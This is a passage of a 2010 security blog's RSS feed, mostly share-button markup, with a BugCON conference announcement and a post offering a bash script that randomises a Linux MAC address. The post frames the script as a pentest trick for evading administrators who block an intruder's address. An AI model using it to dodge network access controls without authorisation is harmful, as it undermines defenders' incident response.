<p><a class="a2a_button_slashdot" href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F11%2Fssh-hacking-and-good-practices%2F&amp;linkname=SSH%20Hacking%20and%20Good%20Practices" title="Slashdot" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a><a class="a2a_button_tumblr" href="http://www.addtoany.com/add_to/tumblr?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F11%2Fssh-hacking-and-good-practices%2F&amp;linkname=SSH%20Hacking%20and%20Good%20Practices" title="Tumblr" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/tumblr.png" width="16" height="16" alt="Tumblr"/></a><a class="a2a_button_wordpress" href="http://www.addtoany.com/add_to/wordpress?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F11%2Fssh-hacking-and-good-practices%2F&amp;linkname=SSH%20Hacking%20and%20Good%20Practices" title="WordPress" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/wordpress.png" width="16" height="16" alt="WordPress"/></a><a class="a2a_button_twitter" href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F11%2Fssh-hacking-and-good-practices%2F&amp;linkname=SSH%20Hacking%20and%20Good%20Practices" title="Twitter" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a><a class="a2a_button_linkedin" href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F11%2Fssh-hacking-and-good-practices%2F&amp;linkname=SSH%20Hacking%20and%20Good%20Practices" title="LinkedIn" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/linkedin.png" width="16" height="16" alt="LinkedIn"/></a><a class="a2a_button_google_bookmarks" href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F11%2Fssh-hacking-and-good-practices%2F&amp;linkname=SSH%20Hacking%20and%20Good%20Practices" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a><a class="a2a_button_facebook" href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F11%2Fssh-hacking-and-good-practices%2F&amp;linkname=SSH%20Hacking%20and%20Good%20Practices" title="Facebook" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a><a class="a2a_button_google_reader" href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F11%2Fssh-hacking-and-good-practices%2F&amp;linkname=SSH%20Hacking%20and%20Good%20Practices" title="Google Reader" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a><a class="a2a_button_digg" href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F11%2Fssh-hacking-and-good-practices%2F&amp;linkname=SSH%20Hacking%20and%20Good%20Practices" title="Digg" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a><a class="a2a_button_meneame" href="http://www.addtoany.com/add_to/meneame?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F11%2Fssh-hacking-and-good-practices%2F&amp;linkname=SSH%20Hacking%20and%20Good%20Practices" title="Meneame" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/meneame.png" width="16" height="16" alt="Meneame"/></a><a class="a2a_button_technorati_favorites" href="http://www.addtoany.com/add_to/technorati_favorites?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F11%2Fssh-hacking-and-good-practices%2F&amp;linkname=SSH%20Hacking%20and%20Good%20Practices" title="Technorati Favorites" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/technorati.png" width="16" height="16" alt="Technorati Favorites"/></a><a class="a2a_button_stumbleupon" href="http://www.addtoany.com/add_to/stumbleupon?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F11%2Fssh-hacking-and-good-practices%2F&amp;linkname=SSH%20Hacking%20and%20Good%20Practices" title="StumbleUpon" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/stumbleupon.png" width="16" height="16" alt="StumbleUpon"/></a><a class="a2a_button_blogger_post" href="http://www.addtoany.com/add_to/blogger_post?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F11%2Fssh-hacking-and-good-practices%2F&amp;linkname=SSH%20Hacking%20and%20Good%20Practices" title="Blogger Post" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/blogger.png" width="16" height="16" alt="Blogger Post"/></a><a class="a2a_button_yahoo_bookmarks" href="http://www.addtoany.com/add_to/yahoo_bookmarks?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F11%2Fssh-hacking-and-good-practices%2F&amp;linkname=SSH%20Hacking%20and%20Good%20Practices" title="Yahoo Bookmarks" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/yahoo.png" width="16" height="16" alt="Yahoo Bookmarks"/></a><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F11%2Fssh-hacking-and-good-practices%2F&amp;title=SSH%20Hacking%20and%20Good%20Practices" id="wpa2a_14"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://hackarandas.com/blog/2010/06/11/ssh-hacking-and-good-practices/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>BugCON Security Conference 2010</title>
		<link>http://hackarandas.com/blog/2010/04/22/bugcon-security-conference-2010/</link>
		<comments>http://hackarandas.com/blog/2010/04/22/bugcon-security-conference-2010/#comments</comments>
		<pubDate>Thu, 22 Apr 2010 06:12:49 +0000</pubDate>
		<dc:creator>Ch0ks</dc:creator>
				<category><![CDATA[Eventos]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Adrian Puente Z.]]></category>
		<category><![CDATA[bugcon]]></category>
		<category><![CDATA[Conferencias]]></category>
		<category><![CDATA[hackarandas]]></category>
		<category><![CDATA[mexico]]></category>
		<category><![CDATA[seguridad informatica]]></category>

		<guid isPermaLink="false">http://hackarandas.com/blog/?p=220</guid>
		<description><![CDATA[Translate to English BugCON Security Conference es un evento de seguridad meramente técnico en donde los mas importantes investigadores del área muestran sus últimos descubrimientos. En la edición 2008 BugCON fue catalogado como el evento de cómputo con nivel mas alto en todo México, por encima de congresos y eventos similares. En 2009 se llego [...]]]></description>
			<content:encoded><![CDATA[<p><center><br />
<a href="http://www.bugcon.org/"><img src="http://hackarandas.com/blog/wp-content/uploads/2010/04/logo-bugcon.png" alt="" title="logo-bugcon" width="200" height="46" class="aligncenter size-full wp-image-221" /></a><br />
<br />
<a href="http://bit.ly/cCO64j">Translate to English</a></center></p>
<p>BugCON Security Conference es un evento de seguridad meramente técnico en donde los mas importantes investigadores del área muestran sus últimos descubrimientos.</p>
<p>En la edición 2008 BugCON fue catalogado como el evento de cómputo con nivel mas alto en todo México, por encima de congresos y eventos similares. En 2009 se llego a mas de 2800 asistentes, 30 conferencias, 11 talleres y 2 competencias.</p>
<p>Este año BugCON celebra su tercer edición del 26 al 28 de Octubre en instalaciones del Instituto Politécnico Nacional en México D.F.</p>
<p>El Call For Papers cierra en Agosto, al igual que el deadline para patrocinadores. Si requieres más información puedes escribir a cualquiera de los organizadores o visitar el sitio web www.bugcon.org</p>
<p>No te lo puedes perder <img src='http://hackarandas.com/blog/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>&#8212;<br />
Armin García López<br />
Presidencia<br />
darknight _AT_ bugcon _DOT_ org</p>
<p>Carlos A. Lozano Vargas<br />
Fundador<br />
vendetta _AT_ bugcon _DOT_ org</p>
<p>Alejandro Hernández Flores<br />
Organizador Técnico<br />
alt3kx _AT_ bugcon _DOT_ org</p>
<p>Añadelo a tus eventos en Facebook!<br />
<center><a href="http://www.facebook.com/event.php?eid=119998731350362"><img src="http://hackarandas.com/blog/wp-content/uploads/2010/04/catarina-bugcon.jpg" alt="" title="catarina-bugcon" width="50" height="50" class="alignleft size-full wp-image-225" /><br /> http://www.facebook.com/event.php?eid=119998731350362</a></center></p>
<p><em>Adrián Puente Z.</em></p>
<p><a class="a2a_button_slashdot" href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F22%2Fbugcon-security-conference-2010%2F&amp;linkname=BugCON%20Security%20Conference%202010" title="Slashdot" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a><a class="a2a_button_tumblr" href="http://www.addtoany.com/add_to/tumblr?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F22%2Fbugcon-security-conference-2010%2F&amp;linkname=BugCON%20Security%20Conference%202010" title="Tumblr" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/tumblr.png" width="16" height="16" alt="Tumblr"/></a><a class="a2a_button_wordpress" href="http://www.addtoany.com/add_to/wordpress?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F22%2Fbugcon-security-conference-2010%2F&amp;linkname=BugCON%20Security%20Conference%202010" title="WordPress" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/wordpress.png" width="16" height="16" alt="WordPress"/></a><a class="a2a_button_twitter" href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F22%2Fbugcon-security-conference-2010%2F&amp;linkname=BugCON%20Security%20Conference%202010" title="Twitter" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a><a class="a2a_button_linkedin" href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F22%2Fbugcon-security-conference-2010%2F&amp;linkname=BugCON%20Security%20Conference%202010" title="LinkedIn" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/linkedin.png" width="16" height="16" alt="LinkedIn"/></a><a class="a2a_button_google_bookmarks" href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F22%2Fbugcon-security-conference-2010%2F&amp;linkname=BugCON%20Security%20Conference%202010" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a><a class="a2a_button_facebook" href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F22%2Fbugcon-security-conference-2010%2F&amp;linkname=BugCON%20Security%20Conference%202010" title="Facebook" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a><a class="a2a_button_google_reader" href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F22%2Fbugcon-security-conference-2010%2F&amp;linkname=BugCON%20Security%20Conference%202010" title="Google Reader" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a><a class="a2a_button_digg" href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F22%2Fbugcon-security-conference-2010%2F&amp;linkname=BugCON%20Security%20Conference%202010" title="Digg" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a><a class="a2a_button_meneame" href="http://www.addtoany.com/add_to/meneame?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F22%2Fbugcon-security-conference-2010%2F&amp;linkname=BugCON%20Security%20Conference%202010" title="Meneame" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/meneame.png" width="16" height="16" alt="Meneame"/></a><a class="a2a_button_technorati_favorites" href="http://www.addtoany.com/add_to/technorati_favorites?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F22%2Fbugcon-security-conference-2010%2F&amp;linkname=BugCON%20Security%20Conference%202010" title="Technorati Favorites" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/technorati.png" width="16" height="16" alt="Technorati Favorites"/></a><a class="a2a_button_stumbleupon" href="http://www.addtoany.com/add_to/stumbleupon?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F22%2Fbugcon-security-conference-2010%2F&amp;linkname=BugCON%20Security%20Conference%202010" title="StumbleUpon" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/stumbleupon.png" width="16" height="16" alt="StumbleUpon"/></a><a class="a2a_button_blogger_post" href="http://www.addtoany.com/add_to/blogger_post?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F22%2Fbugcon-security-conference-2010%2F&amp;linkname=BugCON%20Security%20Conference%202010" title="Blogger Post" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/blogger.png" width="16" height="16" alt="Blogger Post"/></a><a class="a2a_button_yahoo_bookmarks" href="http://www.addtoany.com/add_to/yahoo_bookmarks?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F22%2Fbugcon-security-conference-2010%2F&amp;linkname=BugCON%20Security%20Conference%202010" title="Yahoo Bookmarks" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/yahoo.png" width="16" height="16" alt="Yahoo Bookmarks"/></a><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F22%2Fbugcon-security-conference-2010%2F&amp;title=BugCON%20Security%20Conference%202010" id="wpa2a_16"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://hackarandas.com/blog/2010/04/22/bugcon-security-conference-2010/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Fast MAC Address Changer in Linux</title>
		<link>http://hackarandas.com/blog/2010/04/02/fast-mac-address-changer-in-linux/</link>
		<comments>http://hackarandas.com/blog/2010/04/02/fast-mac-address-changer-in-linux/#comments</comments>
		<pubDate>Fri, 02 Apr 2010 20:01:49 +0000</pubDate>
		<dc:creator>Ch0ks</dc:creator>
				<category><![CDATA[c0de]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Adrian Puente Z.]]></category>
		<category><![CDATA[backtrack]]></category>
		<category><![CDATA[bash]]></category>
		<category><![CDATA[hackarandas]]></category>
		<category><![CDATA[pentest]]></category>

		<guid isPermaLink="false">http://hackarandas.com/blog/?p=205</guid>
		<description><![CDATA[When you are making a pentest sometimes you need to be sneaky and have some tricks in your arsenal to cloak yourself in the network. But some sysadmins are skillfull in their incident response and, sometimes (not many in my experience) they found you and try to block your access creating some ACLs for the [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://hackarandas.com/blog/wp-content/uploads/2010/03/APtext3RWBCol-150x150.jpg" style="margin: 10px 10px 0pt 0pt; float: left; width: 120px; height: 134px;" title="Fractal" alt="" /> When you are making a pentest sometimes you need to be sneaky and have some tricks in your arsenal to cloak yourself in the network. But some sysadmins are skillfull in their incident response and, sometimes (not many in my experience) they found you and try to block your access creating some ACLs for the IP you are using, maybe for your MAC Address.</p>
<p>This script runs on linux and helps you changing your MAC Address in a blink of an eye, this is how it works: you invoke the command and automatically see if you are root, if not it sudo itself to get the needed priviledges, generates a new random mac and installs it in the interface.</p>
<div class="dean_ch" style="white-space: wrap;">-=:<span class="br0">&#41;</span>&gt; changemacrandom.<span class="me1">sh</span> &lt;interface&gt;</div>
<p>For example:</p>
<div class="dean_ch" style="white-space: wrap;">
-=:<span class="br0">&#41;</span>&gt; changemacrandom.<span class="me1">sh</span> eth0<br />
Only root can <span class="kw1">do</span> that! sudoing&#8230;<br />
<span class="me1">eth0</span> &nbsp; &nbsp; &nbsp;Link encap:Ethernet &nbsp;HWaddr <span class="nu0">00</span>:<span class="nu0">15</span>:c5:3d:e9:<span class="nu0">82</span> &nbsp;<br />
Interface eth0 has new mac:<br />
eth0 &nbsp; &nbsp; &nbsp;Link encap:Ethernet &nbsp;HWaddr <span class="nu0">70</span>:e7:<span class="nu0">84</span>:ca:b2:c5 &nbsp;<br />
Restart dhcp client to get a new IP.</div>
<p>The code is really simple:</p>
<div class="dean_ch" style="white-space: wrap;">
<span class="re3">#!/bin/bash</span><br />
<span class="re3"># Script by Adrian Puente Z. apuente _AT_ hackarandas _dot_ com</span><br />
<span class="re3"># Powered by Hackarandas www.hackarandas.com</span><br />
<span class="re3"># Licensed by GNU GPLv3</span><br />
<span class="re3"># http://www.gnu.org/licenses/gpl<span class="nu0">-3.0</span>.txt</span></p>
<p>
<span class="br0">&#91;</span> <span class="re4">$#</span> -eq <span class="nu0">0</span> <span class="br0">&#93;</span> &amp;&amp; <span class="kw3">echo</span> &nbsp;<span class="st0">&quot;Sintax: `basename $0` &lt;interface&gt;&quot;</span> &amp;&amp; <span class="kw3">exit</span> <span class="nu0">0</span></p>
<p><span class="br0">&#91;</span> `<span class="kw2">id</span> -u` -ne <span class="nu0">0</span> <span class="br0">&#93;</span> &amp;&amp; <span class="kw3">echo</span> <span class="st0">&quot;Only root can do that! sudoing&#8230;&quot;</span> <br />
<span class="kw1">if</span> <span class="br0">&#91;</span> <span class="st0">&quot;$EUID&quot;</span> != <span class="nu0">0</span> <span class="br0">&#93;</span>; <span class="kw1">then</span> <span class="kw2">sudo</span> `<span class="kw2">which</span> $<span class="nu0">0</span>` $<span class="nu0">1</span>; <span class="kw3">exit</span>; <span class="kw1">fi</span></p>
<p><span class="re2">INT=</span>$<span class="nu0">1</span></p>
<p><span class="kw1">function</span> gennewmac<br />
<span class="br0">&#123;</span><br />
<span class="kw2">hexdump</span> &nbsp;/dev/urandom | <span class="kw2">head</span> <span class="nu0">-3</span> |\<br />
&nbsp; &nbsp; &nbsp;<span class="kw2">cut</span> -d<span class="st0">&#8216; &#8216;</span> -f2 | <span class="kw1">while</span> <span class="kw2">read</span> -n <span class="nu0">2</span> i<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="kw1">do</span> <span class="kw3">echo</span> -n <span class="re1">$i</span>:<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="kw1">done</span> | <span class="kw2">sed</span> <span class="st0">&#8216;s/::/:/g;s/:$//g&#8217;</span><br />
<span class="br0">&#125;</span></p>
<p><span class="kw1">if</span> &nbsp;ifconfig <span class="re0">$<span class="br0">&#123;</span>INT<span class="br0">&#125;</span></span> <span class="nu0">2</span>&gt; /dev/null <span class="nu0">2</span>&gt;&amp;<span class="nu0">1</span> | <span class="kw2">head</span> <span class="nu0">-1</span> <br />
<span class="kw1">then</span><br />
&nbsp; &nbsp; <span class="re2">NEWMAC=</span>`gennewmac`<br />
&nbsp; &nbsp; <span class="kw2">sleep</span> <span class="nu0">3</span><br />
&nbsp; &nbsp; <span class="kw1">if</span> &nbsp;ifconfig <span class="re0">$<span class="br0">&#123;</span>INT<span class="br0">&#125;</span></span> down hw ether <span class="re0">$<span class="br0">&#123;</span>NEWMAC<span class="br0">&#125;</span></span> <span class="nu0">2</span>&gt;/dev/null<br />
&nbsp; &nbsp; <span class="kw1">then</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> Interface <span class="re0">$<span class="br0">&#123;</span>INT<span class="br0">&#125;</span></span> has new mac: <br />
&nbsp; &nbsp; &nbsp; &nbsp; ifconfig <span class="re0">$<span class="br0">&#123;</span>INT<span class="br0">&#125;</span></span> <span class="nu0">2</span>&gt; /dev/null <span class="nu0">2</span>&gt;&amp;<span class="nu0">1</span> | <span class="kw2">head</span> <span class="nu0">-1</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; ifconfig <span class="re0">$<span class="br0">&#123;</span>INT<span class="br0">&#125;</span></span> up<br />
&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> Restart dhcp client to get a new IP.<br />
&nbsp; &nbsp; <span class="kw1">else</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> <span class="st0">&quot;Error changing MAC to ${NEWMAC}!&quot;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> <span class="st0">&quot;Try again with the same command.&quot;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">exit</span> <span class="nu0">1</span><br />
&nbsp; &nbsp; <span class="kw1">fi</span><br />
<span class="kw1">else</span><br />
&nbsp; &nbsp; <span class="kw3">echo</span> <span class="st0">&quot;Interface ${INT} doesn&#8217;t exists!&quot;</span><br />
&nbsp; &nbsp; <span class="kw3">exit</span> <span class="nu0">1</span><br />
<span class="kw1">fi</span><br />
<span class="kw3">exit</span> <span class="nu0">0</span></div>
<p>You can <a href="http://hackarandas.com/hacking-projects/changemacrandom.sh.gz">download the script</a> or <a href="http://hackarandas.com/hacking-projects/">check other projects</a> i&#8217;ve made.</p>
<p>So that&#8217;s it. Leave your comments please and happy hacking!</p>
<p><em>Adrián Puente Z.</em></p>
<p><a href="http://www.technorati.com/tag/hackarandas" rel="tag">hackarandas</a>, <a href="http://www.technorati.com/tag/hacker" rel="tag">hacker</a>, <a href="http://www.technorati.com/tag/mac+changer" rel="tag">mac changer</a>, <a href="http://www.technorati.com/tag/Adrian+Puente+Z." rel="tag">Adrian Puente Z.</a>, <a href="http://www.technorati.com/tag/Linux" rel="tag">Linux</a>, <a href="http://www.technorati.com/tag/backtrack" rel="tag">backtrack</a>, <a href="http://www.technorati.com/tag/pentest" rel="tag">pentest</a></p>
<p><a class="a2a_button_slashdot" href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F02%2Ffast-mac-address-changer-in-linux%2F&amp;linkname=Fast%20MAC%20Address%20Changer%20in%20Linux" title="Slashdot" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a><a class="a2a_button_tumblr" href="http://www.addtoany.com/add_to/tumblr?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F02%2Ffast-mac-address-changer-in-linux%2F&amp;linkname=Fast%20MAC%20Address%20Changer%20in%20Linux" title="Tumblr" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/tumblr.png" width="16" height="16" alt="Tumblr"/></a><a class="a2a_button_wordpress" href="http://www.addtoany.com/add_to/wordpress?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F02%2Ffast-mac-address-changer-in-linux%2F&amp;linkname=Fast%20MAC%20Address%20Changer%20in%20Linux" title="WordPress" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/wordpress.png" width="16" height="16" alt="WordPress"/></a><a class="a2a_button_twitter" href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F02%2Ffast-mac-address-changer-in-linux%2F&amp;linkname=Fast%20MAC%20Address%20Changer%20in%20Linux" title="Twitter" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a><a class="a2a_button_linkedin" href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F02%2Ffast-mac-address-changer-in-linux%2F&amp;linkname=Fast%20MAC%20Address%20Changer%20in%20Linux" title="LinkedIn" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/linkedin.png" width="16" height="16" alt="LinkedIn"/></a><a class="a2a_button_google_bookmarks" href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F02%2Ffast-mac-address-changer-in-linux%2F&amp;linkname=Fast%20MAC%20Address%20Changer%20in%20Linux" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a><a class="a2a_button_facebook" href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F02%2Ffast-mac-address-changer-in-linux%2F&amp;linkname=Fast%20MAC%20Address%20Changer%20in%20Linux" title="Facebook" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a><a class="a2a_button_google_reader" href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F02%2Ffast-mac-address-changer-in-linux%2F&amp;linkname=Fast%20MAC%20Address%20Changer%20in%20Linux" title="Google Reader" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a><a class="a2a_button_digg" href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F02%2Ffast-mac-address-changer-in-linux%2F&amp;linkname=Fast%20MAC%20Address%20Changer%20in%20Linux" title="Digg" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a><a class="a2a_button_meneame" href="http://www.addtoany.com/add_to/meneame?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F02%2Ffast-mac-address-changer-in-linux%2F&amp;linkname=Fast%20MAC%20Address%20Changer%20in%20Linux" title="Meneame" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/meneame.png" width="16" height="16" alt="Meneame"/></a><a class="a2a_button_technorati_favorites" href="http://www.addtoany.com/add_to/technorati_favorites?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F02%2Ffast-mac-address-changer-in-linux%2F&amp;linkname=Fast%20MAC%20Address%20Changer%20in%20Linux" title="Technorati Favorites" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/technorati.png" width="16" height="16" alt="Technorati Favorites"/></a><a class="a2a_button_stumbleupon" href="http://www.addtoany.com/add_to/stumbleupon?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F02%2Ffast-mac-address-changer-in-linux%2F&amp;linkname=Fast%20MAC%20Address%20Changer%20in%20Linux" title="StumbleUpon" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/stumbleupon.png" width="16" height="16" alt="StumbleUpon"/></a><a class="a2a_button_blogger_post" href="http://www.addtoany.com/add_to/blogger_post?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F02%2Ffast-mac-address-changer-in-linux%2F&amp;linkname=Fast%20MAC%20Address%20Changer%20in%20Linux" title="Blogger Post" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/blogger.png" width="16" height="16" alt="Blogger Post"/></a><a class="a2a_button_yahoo_bookmarks" href="http://www.addtoany.com/add_to/yahoo_bookmarks?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F02%2Ffast-mac-address-changer-in-linux%2F&amp;linkname=Fast%20MAC%20Address%20Changer%20in%20Linux" title="Yahoo Bookmarks" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/yahoo.png" width="16" height="16" alt="Yahoo Bookmarks"/></a><a 